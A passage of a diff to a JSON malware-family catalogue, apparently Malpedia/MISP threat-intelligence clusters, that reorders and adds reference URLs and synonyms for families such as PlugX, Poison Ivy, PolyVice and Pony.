"https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", - "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/", - "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", - "https://blog.ensilo.com/uncovering-new-activity-by-apt10", - "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/", - "https://www.welivesecurity.com/fr/2022/03/25/mustang-pandas-hodur-nouveau-korplug/", - "https://blog.vincss.net/2022/05/re027-china-based-apt-mustang-panda-might-have-still-continued-their-attack-activities-against-organizations-in-Vietnam.html", - "https://blog.xorhex.com/blog/mustangpandaplugx-2/", - "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", - "https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf", - "https://unit42.paloaltonetworks.com/thor-plugx-variant/", - "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", - "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html", - "https://web.archive.org/web/20200424035112/https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf", - "https://www.recordedfuture.com/china-linked-ta428-threat-group", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", - "https://www.youtube.com/watch?v=qEwBGGgWgOM", - "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage", - "https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military", - "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", - "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", - "https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/", - "https://www.secureworks.com/research/threat-profiles/bronze-woodland", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-firestone", - "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://twitter.com/xorhex/status/1399906601562165249?s=20", - "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", - "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/", - "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", - "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader", - "https://twitter.com/stvemillertime/status/1261263000960450562", - "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", - "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html", - "https://www.youtube.com/watch?v=r1zAVX_HnJg", - "https://www.secureworks.com/blog/bronze-president-targets-government-officials", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://attack.mitre.org/groups/G0001/", - "https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", + "https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia", + "https://unit42.paloaltonetworks.com/unsigned-dlls/", + "https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims", "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", - "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://www.bleepingcomputer.com/news/security/new-mustang-panda-hacking-campaign-targets-diplomats-isps/", + "https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers", + "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader", + "https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop", + "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/", + "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", + "https://blog.xorhex.com/blog/mustangpandaplugx-2/", + "https://blog.xorhex.com/blog/mustangpandaplugx-1/", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf", + "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/", + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf", + "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", + "https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_2_LT4.pdf", + "https://blog.xorhex.com/blog/reddeltaplugxchangeup/", + "https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf", + "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", - "https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/", - "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", - "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", + "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.secureworks.com/blog/bronze-president-targets-government-officials", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "https://asec.ahnlab.com/en/49097/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", + "https://twitter.com/xorhex/status/1399906601562165249?s=20", + "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", + "https://risky.biz/whatiswinnti/", + "https://www.youtube.com/watch?v=r1zAVX_HnJg", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://therecord.media/redecho-group-parks-domains-after-public-exposure/", "https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited", - "https://www.secureworks.com/research/threat-profiles/bronze-president" + "https://redalert.nshc.net/2022/04/14/hacking-activity-of-sectorb-group-in-2021/", + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf", + "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", + "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", + "https://www.youtube.com/watch?v=qEwBGGgWgOM", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf", + "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://www.youtube.com/watch?v=IRh6R8o1Q7U", + "https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", + "https://www.contextis.com/en/blog/dll-search-order-hijacking", + "https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/", + "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html", + "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", + "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/", + "https://engineers.ffri.jp/entry/2022/11/30/141346", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage", + "https://attack.mitre.org/groups/G0001/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf", + "https://blog.vincss.net/2022/05/re027-china-based-apt-mustang-panda-might-have-still-continued-their-attack-activities-against-organizations-in-Vietnam.html", + "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", + "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-1223.pdf", + "https://www.youtube.com/watch?v=E2_DTQJjDYc", + "https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/", + "https://kienmanowar.wordpress.com/2023/01/09/quicknote-another-nice-plugx-sample/", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-woodland", + "https://www.welivesecurity.com/fr/2022/03/25/mustang-pandas-hodur-nouveau-korplug/", + "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/", + "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", + "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/", + "https://blog.ensilo.com/uncovering-new-activity-by-apt10", + "https://www.secureworks.com/research/threat-profiles/bronze-express", + "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html", + "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://web.archive.org/web/20191214125833/https://contextis.com/media/downloads/AVIVORE_An_overview.pdf", + "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://www.secureworks.com/research/threat-profiles/bronze-olive", + "https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", + "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", + "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", + "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", + "https://attack.mitre.org/groups/G0096", + "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/", + "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", + "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", + "https://tracker.h3x.eu/info/290", + "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", + "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", + "https://www.secureworks.com/research/bronze-president-targets-ngos", + "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html", + "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html", + "https://www.youtube.com/watch?v=C_TmANnbS2k", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://www.secureworks.com/research/threat-profiles/bronze-president", + "https://www.macnica.net/file/security_report_20160613.pdf" ], "synonyms": [ "Destroy RAT", @@ -38073,8 +39874,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", - "https://attack.mitre.org/groups/G0024", - "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" + "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31", + "https://attack.mitre.org/groups/G0024" ], "synonyms": [], "type": [] @@ -38100,9 +39901,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown", - "https://twitter.com/cyb3rops/status/1129653190444703744", + "https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html", "https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html", - "https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html" + "https://twitter.com/cyb3rops/status/1129653190444703744" ], "synonyms": [ "Blitz", @@ -38119,11 +39920,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug", "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://content.fireeye.com/apt-41/rpt-apt41/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://securelist.com/apt-trends-report-q3-2020/99204/" + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage" ], "synonyms": [ "Barlaiy" @@ -38138,54 +39939,54 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", + "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", + "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", - "https://www.secureworks.com/research/threat-profiles/bronze-firestone", - "https://vblocalhost.com/uploads/VB2020-20.pdf", - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", - "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", - "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis", - "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html", - "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", - "https://attack.mitre.org/groups/G0011", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf", - "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", - "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://www.youtube.com/watch?v=1WfPlgtfWnQ", - "https://engineers.ffri.jp/entry/2022/11/30/141346", - "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/", - "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", - "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", - "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", - "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", - "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", - "http://blogs.360.cn/post/APT_C_01_en.html", - "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", - "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment", - "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", - "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", - "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", + "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", - "https://unit42.paloaltonetworks.com/atoms/crawling-taurus/", - "https://community.riskiq.com/article/56fa1b2f", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://www.recordedfuture.com/china-linked-ta428-threat-group", + "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", + "http://blogs.360.cn/post/APT_C_01_en.html", + "https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", + "https://www.youtube.com/watch?v=1WfPlgtfWnQ", + "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", + "https://vblocalhost.com/uploads/VB2020-20.pdf", + "https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", + "https://unit42.paloaltonetworks.com/atoms/crawling-taurus/", + "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", - "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" + "https://engineers.ffri.jp/entry/2022/11/30/141346", + "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf", + "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", + "https://community.riskiq.com/article/56fa1b2f", + "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf", + "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html", + "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", + "https://attack.mitre.org/groups/G0011", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [ "SPIVY", @@ -38216,8 +40017,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat", "http://fireeyeday.com/1604/pdf/KeyNote_2.pdf", - "https://youtu.be/DDA2uSxjVWY?t=344", - "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf", + "https://youtu.be/DDA2uSxjVWY?t=344" ], "synonyms": [ "KABOB", @@ -38247,9 +40048,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke", "https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/", - "https://www.secureworks.com/research/threat-profiles/iron-hemlock", "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-hemlock" ], "synonyms": [], "type": [] @@ -38275,10 +40076,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyvice", - "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/", - "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/" + "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/", + "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/" + ], + "synonyms": [ + "Chily" ], - "synonyms": [], "type": [] }, "uuid": "31017b7c-c023-4247-b37d-f15f2df5d25a", @@ -38289,28 +40092,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", - "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://github.com/nyx0/Pony", + "http://www.secureworks.com/research/threat-profiles/gold-galleon", "https://www.secureworks.com/research/threat-profiles/gold-essex", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.knowbe4.com/pony-stealer", - "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", "https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.youtube.com/watch?v=EyDiIAt__dI", "https://www.youtube.com/watch?v=y8Z9KnL8s8s", - "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf", - "https://github.com/nyx0/Pony", "http://www.secureworks.com/research/threat-profiles/gold-evergreen", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.knowbe4.com/pony-stealer", + "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry", + "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-galleon", "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", + "https://www.youtube.com/watch?v=42yldTQ-fWA", + "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", + "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "http://www.secureworks.com/research/threat-profiles/gold-essex", "https://www.secureworks.com/research/threat-profiles/gold-evergreen", - "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry", - "https://www.youtube.com/watch?v=42yldTQ-fWA", - "https://intel471.com/blog/a-brief-history-of-ta505", - "http://www.secureworks.com/research/threat-profiles/gold-galleon", - "https://www.youtube.com/watch?v=EyDiIAt__dI", - "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf" + "https://intel471.com/blog/a-brief-history-of-ta505" ], "synonyms": [ "Fareit", @@ -38326,8 +40129,8 @@ "meta": { "refs": [ 